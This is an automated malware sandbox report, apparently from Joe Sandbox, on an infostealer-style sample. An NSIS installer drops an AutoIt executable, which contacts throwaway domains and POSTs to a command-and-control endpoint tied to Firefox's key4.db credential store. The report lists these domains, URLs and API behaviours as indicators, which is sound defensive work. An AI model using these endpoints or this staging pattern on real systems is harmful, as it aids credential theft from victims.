                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comCode function: 10_2_00E3D889 InternetReadFile,SetEvent,GetLastError,SetEvent,10_2_00E3D889
                  Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                  Source: global trafficDNS traffic detected: DNS query: aGpUaEJqSGxZhd.aGpUaEJqSGxZhd
                  Source: global trafficDNS traffic detected: DNS query: ingreem-eilish.biz
                  Source: global trafficDNS traffic detected: DNS query: immureprech.biz
                  Source: global trafficDNS traffic detected: DNS query: deafeninggeh.biz
                  Source: global trafficDNS traffic detected: DNS query: effecterectz.xyz
                  Source: global trafficDNS traffic detected: DNS query: diffuculttan.xyz
                  Source: global trafficDNS traffic detected: DNS query: debonairnukk.xyz
                  Source: global trafficDNS traffic detected: DNS query: wrathful-jammy.cyou
                  Source: global trafficDNS traffic detected: DNS query: awake-weaves.cyou
                  Source: global trafficDNS traffic detected: DNS query: sordid-snaked.cyou
                  Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
                  Source: global trafficDNS traffic detected: DNS query: sputnik-1985.com
                  Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sputnik-1985.com
                  Source: HouseholdsClicking.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                  Source: Appliance.com, 0000000A.00000003.2059211913.0000000001CFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                  Source: Appliance.com, 0000000A.00000003.2059211913.0000000001CFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                  Source: HouseholdsClicking.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                  Source: HouseholdsClicking.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                  Source: HouseholdsClicking.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                  Source: Appliance.com, 0000000A.00000003.1999420955.0000000004B9D000.00000004.00000800.00020000.00000000.sdmp, Leslie.0.dr, Appliance.com.1.drString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
                  Source: Appliance.com, 0000000A.00000003.1999420955.0000000004B9D000.00000004.00000800.00020000.00000000.sdmp, Leslie.0.dr, Appliance.com.1.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
                  Source: Appliance.com, 0000000A.00000003.1999420955.0000000004B9D000.00000004.00000800.00020000.00000000.sdmp, Leslie.0.dr, Appliance.com.1.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
                  Source: Appliance.com, 0000000A.00000003.1999420955.0000000004B9D000.00000004.00000800.00020000.00000000.sdmp, Leslie.0.dr, Appliance.com.1.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
                  Source: Appliance.com, 0000000A.00000003.1999420955.0000000004B9D000.00000004.00000800.00020000.00000000.sdmp, Leslie.0.dr, Appliance.com.1.drString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
                  Source: Appliance.com, 0000000A.00000003.2059211913.0000000001CFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                  Source: HouseholdsClicking.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                  Source: Appliance.com, 0000000A.00000003.2059211913.0000000001CFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                  Source: Appliance.com, 0000000A.00000003.2059211913.0000000001CFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                  Source: HouseholdsClicking.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                  Source: HouseholdsClicking.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                  Source: HouseholdsClicking.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                  Source: Appliance.com, 0000000A.00000003.2059211913.0000000001CFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                  Source: HouseholdsClicking.exeString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                  Source: Appliance.com, 0000000A.00000003.2059211913.0000000001CFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                  Source: HouseholdsClicking.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                  Source: Appliance.com, 0000000A.00000003.2059211913.0000000001CFB000.00000004.00000020.00020000.00000000.sdmp, HouseholdsClicking.exeString found in binary or memory: http://ocsp.digicert.com0
                  Source: HouseholdsClicking.exeString found in binary or memory: http://ocsp.digicert.com0A
                  Source: HouseholdsClicking.exeString found in binary or memory: http://ocsp.digicert.com0C
                  Source: HouseholdsClicking.exeString found in binary or memory: http://ocsp.digicert.com0X
                  Source: Appliance.com, 0000000A.00000003.1999420955.0000000004B9D000.00000004.00000800.00020000.00000000.sdmp, Leslie.0.dr, Appliance.com.1.drString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
                  Source: Appliance.com, 0000000A.00000003.2059211913.0000000001CFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                  Source: Appliance.com, 0000000A.00000003.1999420955.0000000004B9D000.00000004.00000800.00020000.00000000.sdmp, Leslie.0.dr, Appliance.com.1.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
                  Source: Appliance.com, 0000000A.00000003.1999420955.0000000004B9D000.00000004.00000800.00020000.00000000.sdmp, Leslie.0.dr, Appliance.com.1.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
                  Source: Appliance.com, 0000000A.00000003.1999420955.0000000004B9D000.00000004.00000800.00020000.00000000.sdmp, Leslie.0.dr, Appliance.com.1.drString found in binary or memory: http://ocsp2.globalsign.com/rootr606
                  Source: Appliance.com, 0000000A.00000003.1999420955.0000000004B9D000.00000004.00000800.00020000.00000000.sdmp, Leslie.0.dr, Appliance.com.1.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
                  Source: Appliance.com, 0000000A.00000003.1999420955.0000000004B9D000.00000004.00000800.00020000.00000000.sdmp, Leslie.0.dr, Appliance.com.1.drString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
                  Source: Appliance.com, 0000000A.00000002.2115264331.0000000004315000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://store.steamp
                  Source: Appliance.com, 0000000A.00000000.1780609584.0000000000E95000.00000002.00000001.01000000.00000007.sdmp, Appliance.com, 0000000A.00000003.1999420955.0000000004B9D000.00000004.00000800.00020000.00000000.sdmp, Replacing.0.dr, Appliance.com.1.drString found in binary or memory: http://www.autoitscript.com/autoit3/X
                  Source: HouseholdsClicking.exeString found in binary or memory: http://www.digicert.com/CPS0
                  Source: Appliance.com, 0000000A.00000003.2059211913.0000000001CFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                  Source: Appliance.com, 0000000A.00000003.2059211913.0000000001CFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                  Source: Appliance.com, 0000000A.00000003.2036642508.000000000434C000.00000004.00000800.00020000.00000000.sdmp, Appliance.com, 0000000A.00000003.2035850433.000000000442F000.00000004.00000800.00020000.00000000.sdmp, Appliance.com, 0000000A.00000003.2035941750.000000000434B000.00000004.00000800.00020000.00000000.sdmp, Appliance.com, 0000000A.00000003.2036958344.000000000434C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                  Source: Appliance.com, 0000000A.00000003.2036642508.000000000434C000.00000004.00000800.00020000.00000000.sdmp, Appliance.com, 0000000A.00000003.2035850433.000000000442F000.00000004.00000800.00020000.00000000.sdmp, Appliance.com, 0000000A.00000003.2035941750.000000000434B000.00000004.00000800.00020000.00000000.sdmp, Appliance.com, 0000000A.00000003.2036958344.000000000434C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                  Source: Appliance.com, 0000000A.00000003.2036642508.000000000434C000.00000004.00000800.00020000.00000000.sdmp, Appliance.com, 0000000A.00000003.2035850433.000000000442F000.00000004.00000800.00020000.00000000.sdmp, Appliance.com, 0000000A.00000003.2035941750.000000000434B000.00000004.00000800.00020000.00000000.sdmp, Appliance.com, 0000000A.00000003.2036958344.000000000434C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                  Source: Appliance.com, 0000000A.00000003.2036642508.000000000434C000.00000004.00000800.00020000.00000000.sdmp, Appliance.com, 0000000A.00000003.2035850433.000000000442F000.00000004.00000800.00020000.00000000.sdmp, Appliance.com, 0000000A.00000003.2035941750.000000000434B000.00000004.00000800.00020000.00000000.sdmp, Appliance.com, 0000000A.00000003.2036958344.000000000434C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                  Source: Appliance.com, 0000000A.00000002.2115264331.0000000004315000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastl
                  Source: Appliance.com, 0000000A.00000002.2115264331.0000000004315000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastlyVG7
                  Source: Appliance.com, 0000000A.00000003.2035850433.000000000442F000.00000004.00000800.00020000.00000000.sdmp, Appliance.com, 0000000A.00000003.2035941750.000000000434B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: Appliance.com, 0000000A.00000003.2035850433.000000000442F000.00000004.00000800.00020000.00000000.sdmp, Appliance.com, 0000000A.00000003.2035941750.000000000434B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                  Source: Appliance.com, 0000000A.00000003.2035850433.000000000442F000.00000004.00000800.00020000.00000000.sdmp, Appliance.com, 0000000A.00000003.2035941750.000000000434B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: Appliance.com, 0000000A.00000002.2115565079.00000000045F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://effecterectz.xyz/api
                  Source: HouseholdsClicking.exeString found in binary or memory: https://notepad-plus-plus.org/0
                  Source: Appliance.com, 0000000A.00000002.2113990357.0000000001A6C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sordid-snaked.cyou:443/api
                  Source: Appliance.com, 0000000A.00000003.2060885698.000000000433C000.00000004.00000800.00020000.00000000.sdmp, Appliance.com, 0000000A.00000002.2114472331.0000000001A94000.00000004.00000020.00020000.00000000.sdmp, Appliance.com, 0000000A.00000003.2059066232.0000000004337000.00000004.00000800.00020000.00000000.sdmp, Appliance.com, 0000000A.00000002.2115264331.00000000042FA000.00000004.00000800.00020000.00000000.sdmp, Appliance.com, 0000000A.00000003.2059317264.000000000433C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/
                  Source: Appliance.com, 0000000A.00000002.2115264331.00000000042FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/%e
                  Source: Appliance.com, 0000000A.00000002.2115264331.0000000004335000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/)g
                  Source: Appliance.com, 0000000A.00000002.2115530559.00000000043F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/Cj9F
                  Source: Appliance.com, 0000000A.00000003.2060885698.000000000433C000.00000004.00000800.00020000.00000000.sdmp, Appliance.com, 0000000A.00000003.2059066232.0000000004337000.00000004.00000800.00020000.00000000.sdmp, Appliance.com, 0000000A.00000003.2059317264.000000000433C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/Wn3
                  Source: Appliance.com, 0000000A.00000002.2115530559.00000000043F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/Y
                  Source: Appliance.com, 0000000A.00000002.2115565079.00000000045F0000.00000004.00000800.00020000.00000000.sdmp, Appliance.com, 0000000A.00000002.2115045633.0000000001C48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/api
                  Source: Appliance.com, 0000000A.00000002.2115565079.00000000045F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/api#bq
                  Source: Appliance.com, 0000000A.00000002.2115565079.00000000045F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/api/
                  Source: Appliance.com, 0000000A.00000002.2115530559.00000000043F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/shqK
                  Source: Appliance.com, 0000000A.00000002.2113990357.0000000001A6C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com:443/api
                  Source: Appliance.com, 0000000A.00000002.2113990357.0000000001A6C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com:443/api2o4p.default-release/key4.dbPK
                  Source: Appliance.com, 0000000A.00000002.2115264331.0000000004315000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.s
                  Source: Appliance.com, 0000000A.00000003.2036753349.0000000004437000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.microsof
                  Source: Appliance.com, 0000000A.00000003.2060048594.00000000060E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                  Source: Appliance.com, 0000000A.00000003.2060048594.00000000060E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                  Source: Appliance.com, 0000000A.00000003.2036831338.0000000001D14000.00000004.00000020.00020000.00000000.sdmp, Appliance.com, 0000000A.00000003.2036753349.0000000004435000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                  Source: Appliance.com, 0000000A.00000003.2036831338.0000000001CEF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                  Source: Appliance.com, 0000000A.00000003.2036831338.0000000001D14000.00000004.00000020.00020000.00000000.sdmp, Appliance.com, 0000000A.00000003.2036753349.0000000004435000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                  Source: Appliance.com, 0000000A.00000003.2036831338.0000000001CEF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                  Source: Appliance.com, 0000000A.00000003.1999420955.0000000004B9D000.00000004.00000800.00020000.00000000.sdmp, Leslie.0.dr, Appliance.com.1.drString found in binary or memory: https://www.autoitscript.com/autoit3/
                  Source: Appliance.com, 0000000A.00000003.2036642508.000000000434C000.00000004.00000800.00020000.00000000.sdmp, Appliance.com, 0000000A.00000003.2035850433.000000000442F000.00000004.00000800.00020000.00000000.sdmp, Appliance.com, 0000000A.00000003.2035941750.000000000434B000.00000004.00000800.00020000.00000000.sdmp, Appliance.com, 0000000A.00000003.2036958344.000000000434C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                  Source: Appliance.com.1.drString found in binary or memory: https://www.globalsign.com/repository/0
                  Source: Appliance.com, 0000000A.00000003.2036642508.000000000434C000.00000004.00000800.00020000.00000000.sdmp, Appliance.com, 0000000A.00000003.2035850433.000000000442F000.00000004.00000800.00020000.00000000.sdmp, Appliance.com, 0000000A.00000003.2035941750.000000000434B000.00000004.00000800.00020000.00000000.sdmp, Appliance.com, 0000000A.00000003.2036958344.000000000434C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                  Source: Appliance.com, 0000000A.00000003.2060048594.00000000060E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
                  Source: Appliance.com, 0000000A.00000003.2060048594.00000000060E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
                  Source: Appliance.com, 0000000A.00000003.2060048594.00000000060E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                  Source: Appliance.com, 0000000A.00000003.2060048594.00000000060E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                  Source: Appliance.com, 0000000A.00000003.2060048594.00000000060E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                  Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49737 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49738 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49739 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49740 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49741 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49742 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49743 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49744 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49745 version: TLS 1.2
                  Source: C:\Users\user\Desktop\HouseholdsClicking.exeCode function: 0_2_004050F9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004050F9
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comCode function: 10_2_00E3F7C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,10_2_00E3F7C7
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comCode function: 10_2_00E3F55C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,10_2_00E3F55C
                  Source: C:\Users\user\Desktop\HouseholdsClicking.exeCode function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044D1
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comCode function: 10_2_00E59FD2 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,10_2_00E59FD2
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comCode function: 10_2_00DDFFE0 CloseHandle,NtProtectVirtualMemory,10_2_00DDFFE0
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comCode function: 10_2_00E34763: GetFullPathNameW,_wcslen,CreateDirectoryW,CreateFileW,RemoveDirectoryW,DeviceIoControl,CloseHandle,CloseHandle,10_2_00E34763
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comCode function: 10_2_00E21B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,10_2_00E21B4D
                  Source: C:\Users\user\Desktop\HouseholdsClicking.exeCode function: 0_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx,0_2_004038AF
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comCode function: 10_2_00E2F20D ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,10_2_00E2F20D
                  Source: C:\Users\user\Desktop\HouseholdsClicking.exeFile created: C:\Windows\ArHuntingtonJump to behavior
                  Source: C:\Users\user\Desktop\HouseholdsClicking.exeFile created: C:\Windows\ProductiveRacingJump to behavior
                  Source: C:\Users\user\Desktop\HouseholdsClicking.exeFile created: C:\Windows\BbsStolenJump to behavior
                  Source: C:\Users\user\Desktop\HouseholdsClicking.exeFile created: C:\Windows\ScoreAtomJump to behavior
                  Source: C:\Users\user\Desktop\HouseholdsClicking.exeCode function: 0_2_0040737E0_2_0040737E
                  Source: C:\Users\user\Desktop\HouseholdsClicking.exeCode function: 0_2_00406EFE0_2_00406EFE
                  Source: C:\Users\user\Desktop\HouseholdsClicking.exeCode function: 0_2_004079A20_2_004079A2
                  Source: C:\Users\user\Desktop\HouseholdsClicking.exeCode function: 0_2_004049A80_2_004049A8
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comCode function: 10_2_00DE801710_2_00DE8017
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comCode function: 10_2_00DCE1F010_2_00DCE1F0
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comCode function: 10_2_00DDE14410_2_00DDE144
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comCode function: 10_2_00DC22AD10_2_00DC22AD
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comCode function: 10_2_00DE22A210_2_00DE22A2
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comCode function: 10_2_00DFA26E10_2_00DFA26E
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comCode function: 10_2_00DDC62410_2_00DDC624
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comCode function: 10_2_00E4C8A410_2_00E4C8A4
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comCode function: 10_2_00DFE87F10_2_00DFE87F
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comCode function: 10_2_00DF6ADE10_2_00DF6ADE
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comCode function: 10_2_00E32A0510_2_00E32A05
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comCode function: 10_2_00E28BFF10_2_00E28BFF
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comCode function: 10_2_00DDCD7A10_2_00DDCD7A
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comCode function: 10_2_00DECE1010_2_00DECE10
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comCode function: 10_2_00DF715910_2_00DF7159
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comCode function: 10_2_00DC924010_2_00DC9240
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comCode function: 10_2_00E5531110_2_00E55311
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comCode function: 10_2_00DC96E010_2_00DC96E0
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comCode function: 10_2_00DE170410_2_00DE1704
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comCode function: 10_2_00DE1A7610_2_00DE1A76
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comCode function: 10_2_00DE7B8B10_2_00DE7B8B
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comCode function: 10_2_00DC9B6010_2_00DC9B60
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comCode function: 10_2_00DE7DBA10_2_00DE7DBA
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comCode function: 10_2_00DE1D2010_2_00DE1D20
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comCode function: 10_2_00DE1FE710_2_00DE1FE7
                  Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\19152\Appliance.com 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comCode function: String function: 00DDFD52 appears 40 times
                  Source: C:\Users\user\AppData\Local\Temp\19152\Appliance.comCode function: String function: 00DE0DA0 appears 46 times
                  Source: C:\Users\user\Desktop\HouseholdsClicking.exeCode function: String function: 004062CF appears 58 times
                  Source: HouseholdsClicking.exeStatic PE information: invalid certificate
                  Source: HouseholdsClicking.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
